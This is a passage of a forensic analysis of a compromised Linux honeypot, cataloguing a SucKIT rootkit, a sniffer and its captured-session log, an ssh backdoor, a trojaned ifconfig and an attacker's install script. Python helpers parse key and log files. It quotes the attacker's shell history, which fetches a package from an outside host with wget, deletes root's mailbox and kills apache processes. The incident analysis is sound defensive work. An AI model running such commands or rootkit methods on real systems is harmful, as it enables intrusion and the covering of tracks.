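"""Pull the public fields (size, exponent, modulus, comment) out of SSH1 key
files such as /usr/lib/sp0_key, /usr/include/icekey.h and /lib/.x/s/s_h_k, and
out of a matching .pub line, so keys planted by different kits can be compared.
Added example, not part of the report; the key below is constructed from fake
numbers (not a real key).  Assumed layout: SSH1 'SSH PRIVATE KEY FILE FORMAT
1.1' id string, cipher byte, 4 reserved bytes, u32 bits, mpint n, mpint e,
length-prefixed comment, then the (possibly encrypted) private section."""
import struct

SSH1_MAGIC = b"SSH PRIVATE KEY FILE FORMAT 1.1\n\0"

def _get_mpint1(buf, off):
    """SSH1 bignum: u16 bit count, then (bits+7)//8 big-endian bytes."""
    (bits,) = struct.unpack_from(">H", buf, off)
    nbytes = (bits + 7) // 8
    value = int.from_bytes(buf[off + 2: off + 2 + nbytes], "big")
    return value, off + 2 + nbytes

def parse_ssh1_private(blob):
    """Return the plaintext public part of an SSH1 private key file."""
    if not blob.startswith(SSH1_MAGIC):
        raise ValueError("not an SSH1 private key file")
    off = len(SSH1_MAGIC)
    cipher = blob[off]                    # 0 = unencrypted private section
    off += 1 + 4                          # cipher byte + reserved u32
    (bits,) = struct.unpack_from(">I", blob, off)
    off += 4
    n, off = _get_mpint1(blob, off)
    e, off = _get_mpint1(blob, off)
    (clen,) = struct.unpack_from(">I", blob, off)
    off += 4
    comment = blob[off: off + clen].decode("latin-1")
    off += clen
    return {"bits": bits, "n": n, "e": e, "comment": comment,
            "cipher": cipher, "private_bytes": len(blob) - off}

def parse_ssh1_public(line):
    """'bits exponent modulus [comment]', the RSA1 .pub line format."""
    parts = line.split(None, 3)
    comment = parts[3].strip() if len(parts) > 3 else ""
    return {"bits": int(parts[0]), "e": int(parts[1]), "n": int(parts[2]),
            "comment": comment}

def same_key(priv, pub):
    """Public and private files belong together when modulus and exponent agree."""
    return priv["n"] == pub["n"] and priv["e"] == pub["e"]

def _put_mpint1(v):
    bits = v.bit_length()
    return struct.pack(">H", bits) + v.to_bytes((bits + 7) // 8, "big")

def build_fake_key(n, e, comment, private_len=336):
    """Constructed fixture: unencrypted SSH1 key file with a dummy private part
    (336 bytes is what a 1024-bit key's padded private section occupies)."""
    blob = SSH1_MAGIC + bytes([0]) + struct.pack(">I", 0)
    blob += struct.pack(">I", n.bit_length()) + _put_mpint1(n) + _put_mpint1(e)
    blob += struct.pack(">I", len(comment)) + comment.encode()
    return blob + b"\0" * private_len

def demo():
    """Build a fake 1024-bit key with e=35 and the s_h_k comment, parse both halves."""
    n = (1 << 1023) | 0x12345             # fake modulus, 1024 bits
    comment = "root@fred.psiware.net"
    blob = build_fake_key(n, 35, comment)
    priv = parse_ssh1_private(blob)
    pub = parse_ssh1_public(f"1024 35 {n} {comment}\n")
    return {"file_len": len(blob), "priv": priv, "pub": pub,
            "match": same_key(priv, pub)}

if __name__ == "__main__":
    r = demo()
    print(r["file_len"], r["priv"]["bits"], r["priv"]["comment"], r["match"])
```

With a 1024-bit modulus, exponent 35 and the 21-byte comment, the constructed file comes out at 536 bytes, exactly the size recorded for s_h_k above, which is a good sign the assumed layout is right. Comparing the modulus across the three planted keys tells whether the kits share one key (and therefore one author or source) or were generated independently.
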


/lib/.x/s/lsn

a4073ec9e5602c8ff9fdcd9aee11b56d ---> 5192 bytes <---

Linux sniffer, compressed with UPX (see http://upx.tsx.org); unpack it with 'upx -d' before running strings on it.

Its output is sent to /lib/.x/s/mfs.


/lib/.x/s/port

cbe94e12777a4890accf87b6ffcbfdfc ---> 5 bytes <---

ASCII file containing 3128. It is the TCP port used by /lib/.x/s/xopen for its ssh server (3128 is the usual Squid proxy port, so the listener passes as a web proxy).


/lib/.x/s/mfs

4aaf69370305d47e01f74cf6cb74c237 ---> 1224 bytes <---

Log file of the lsn sniffer. It records a few connections: several outgoing ftp sessions to 63.99.224.38 and one incoming telnet, the Undernet proxy scan also seen in /usr/lib/libice.log:

============================================================
Time: Sun Aug 10 15:40:47     Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:40:50     Size: 80
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:40:56     Size: 60
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:41:08     Size: 40
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:41:32     Size: 20
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 16:04:13     Size: 44
Path: proxyscan.undernet.org => 192.168.1.79 [23]
------------------------------------------------------------
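
An added example, not part of the report or of the rootkit: a Python parser for the record format above, with a per-peer summary of the sessions, so that a larger mfs file can be turned into a timeline. The log carries no year, so 2003 (the date of the incident) is supplied as an assumption; the sample input is a copy of the six records quoted above.

```python
"""Parse the records the 'lsn' sniffer writes to /lib/.x/s/mfs and summarise
them per peer and port.  Added example, not part of the report or of the
rootkit.  The log carries no year, so 2003 (the date of the incident) is
supplied as an assumption; the sample below is a copy of the six records
quoted in the report."""
import re
from datetime import datetime

ASSUMED_YEAR = 2003
HONEYPOT_IP = "192.168.1.79"   # local address of the compromised host

# Constructed: the /lib/.x/s/mfs contents as quoted above.
MFS_LOG = """\
============================================================
Time: Sun Aug 10 15:40:47     Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:40:50     Size: 80
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:40:56     Size: 60
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:41:08     Size: 40
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 15:41:32     Size: 20
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------
============================================================
Time: Sun Aug 10 16:04:13     Size: 44
Path: proxyscan.undernet.org => 192.168.1.79 [23]
------------------------------------------------------------
"""

# One record: a Time/Size line followed by a Path line.
RECORD_RE = re.compile(
    r"Time:\s+(?P<time>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d)\s+Size:\s+(?P<size>\d+)\s*\n"
    r"Path:\s+(?P<src>\S+)\s+=>\s+(?P<dst>\S+)\s+\[(?P<port>\d+)\]"
)

def parse_mfs(text, year=ASSUMED_YEAR):
    """Return one dict per record; 'size' is the number of bytes the sniffer kept."""
    records = []
    for m in RECORD_RE.finditer(text):
        stamp = " ".join(m.group("time").split())          # collapse day padding
        when = datetime.strptime(f"{year} {stamp}", "%Y %a %b %d %H:%M:%S")
        records.append({"time": when, "src": m.group("src"), "dst": m.group("dst"),
                        "port": int(m.group("port")), "size": int(m.group("size"))})
    return records

def summarise(records, local_ip=HONEYPOT_IP):
    """Group by (direction, peer, port): session count, bytes, first and last time."""
    summary = {}
    for r in records:
        if r["src"] == local_ip:
            key = ("out", r["dst"], r["port"])
        else:
            key = ("in", r["src"], r["port"])
        s = summary.setdefault(key, {"sessions": 0, "bytes": 0,
                                     "first": r["time"], "last": r["time"]})
        s["sessions"] += 1
        s["bytes"] += r["size"]
        s["first"] = min(s["first"], r["time"])
        s["last"] = max(s["last"], r["time"])
    return summary

if __name__ == "__main__":
    for (direction, peer, port), s in sorted(summarise(parse_mfs(MFS_LOG)).items()):
        print(f"{direction:3} {peer}:{port}  sessions={s['sessions']} "
              f"bytes={s['bytes']} {s['first']:%H:%M:%S}-{s['last']:%H:%M:%S}")
```

On the sample this yields five outgoing ftp sessions to 63.99.224.38:21 between 15:40:47 and 15:41:32 (300 captured bytes in total) and one incoming session on port 23 at 16:04:13; the shrinking sizes of the ftp captures suggest the sniffer only keeps the first bytes of each session, where the USER/PASS exchange lives.
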


/lib/.x/s/r_s

f87c74d6bc8c09a6f9bd4f005f314f43 ---> 512 bytes <---

Random seed file for the ssh server in /lib/.x/s/xopen.


/lib/.x/s/pid

cf20da4e54f0b6a827d4a2fdab680528 ---> 6 bytes <---

PID file for the ssh server in /lib/.x/s/xopen. Shows the PID 25241, the latest running xopen process.


/lib/.x/install.log

4cff27a31b0ba259e1b23ce53fe2ebfc ---> 2442 bytes <---

Log file from /lib/.x/s/xopen (process 25239). It is full of entries like:

#####################################################
# SucKIT version 1.3b by Unseen  #
#####################################################

RK_Init: idt=0xffc17800, FUCK: Can't find sys_call_table[]

SucKIT does not use kernel modules: it patches the running kernel through /dev/kmem, locating sys_call_table by way of the interrupt descriptor table (the idt= value above). On this kernel that lookup failed, so the system calls were never hooked and none of the hiding worked.


/lib/.x/hide.log

64998f31cbc2a3c1bc4fbbf28a0382d7 ---> 222 bytes <---

Log file of the 'hide' script (see above). It shows the same failure: the SucKIT kernel part never installed, so no process was hidden.

#####################################################
# SucKIT version 1.3b by Unseen  #
#####################################################
RK_Init: idt=0xffc17800, FUCK: Can't find sys_call_table[]


/lib/.x/sk

4a2ba3c11bc601716a0af3d0dcd0b158 ---> 28632 bytes <---

SucKIT rootkit, version 1.3b, see http://sd.g-art.nl/sk

From its README file:

  The SucKIT is easy-to-use, Linux-i386 kernel-based rootkit. The code
  stays in memory through /dev/kmem trick, without help of LKM support
  nor System.map or such things. Everything is done on the fly. It can
  hide PIDs, files, tcp/udp/raw sockets, sniff TTYs. Next, it have
  integrated TTY shell access (xor+sha1) which can be invoked through
  any running service on a server. No compiling on target box needed,
  one binary can work on any of 2.2.x & 2.4.x kernels precompiled (libc-free)

This binary was created by the script 'inst'.


/lib/.x/.boot

b3b377e87fecd930a4a6fbf13aac054f ---> 1223 bytes <---

Installation script for SucKIT & friends.

In particular, it tries to start the ssh server, the network sniffer and the tty sniffer, hiding their associated processes. It then mails this information to skiZophrenia_sick@yahoo.com (the address that appears in /var/log/maillog at 15:43:43).

(Un)fortunately it didn't work.


/root/sslstop.tar.gz

b8fdf7e848fde9e659ac6bc2c22fc871 ---> 1627 bytes <---

sslstop package, fetched with 'wget izolam.net/sslstop.tar.gz' (see /.bash_history below). It contains the sources for two programs, sslstop & sslport, that edit the httpd configuration so that httpd no longer uses the standard SSL port 443 and the 'HAVE_SSL' tag becomes 'HAVE_SSS' (see /etc/httpd/conf/httpd.conf above).


/root/sslstop/Makefile

67c55b1cd1c1e0fb259fa0944cdba875 ---> 87 bytes <---

Makefile for the sslstop package (see above).


/root/sslstop/sslport.c

2716b9205cafdd8026521884aa64238c ---> 2794 bytes <---

Source file for the sslport binary.


/root/sslstop/sslstop.c

1288b008faeb780f22aae86fe9397d6a ---> 1809 bytes <---

Source file for the sslstop binary.


/root/sslstop/sslstop

5bcd845b4f43b24c1c584b7b495f502e ---> 16452 bytes <---

sslstop binary, built from the package above.


/root/sslstop/sslport

ee39910251ea42f812334865dfb84613 ---> 17351 bytes <---

sslport binary, built from the package above.


/sbin/ifconfig

bbdf9f3d6ed21c03b594adcd936c2961 ---> 22328 bytes <---

Trojaned ifconfig binary. It hides the PROMISC flag of the interface, so the sniffers' promiscuous mode is not visible in its output. The original (51164 bytes) is in /usr/lib/libshtift/ifconfig. A trusted ifconfig from the CD still shows the flag, and the kernel logs 'device eth0 entered promiscuous mode' when a sniffer starts, unless that log has been cleaned.

Contained in rk.tar.gz package


/.bash_history

58a1787224e531e42880e5af2bd2ac69 ---> 235 bytes <---

History file. It contains the following commands:

uptime
./inst
hostname
hostname sbm79.dtc.apu.edu
cd /dev/shm/sc
./install sbm79.dtc.apu.edu
rm -rf /var/mail/root
ps x
cd /tmp
ls -a
wget izolam.net/sslstop.tar.gz
ps x
ps aux | grep apache
kill -9  21510  21511 23289  23292 23302

This is the hacker's own session: running the SucKIT installer ('./inst', see /lib/.x/inst above), setting the host name and passing it to the rk.tar.gz 'install' script run from /dev/shm/sc, deleting root's mailbox, fetching the sslstop package, and killing a set of running apache processes. The history is short and unordered in time, so it should be read alongside the timestamps recorded above rather than on its own.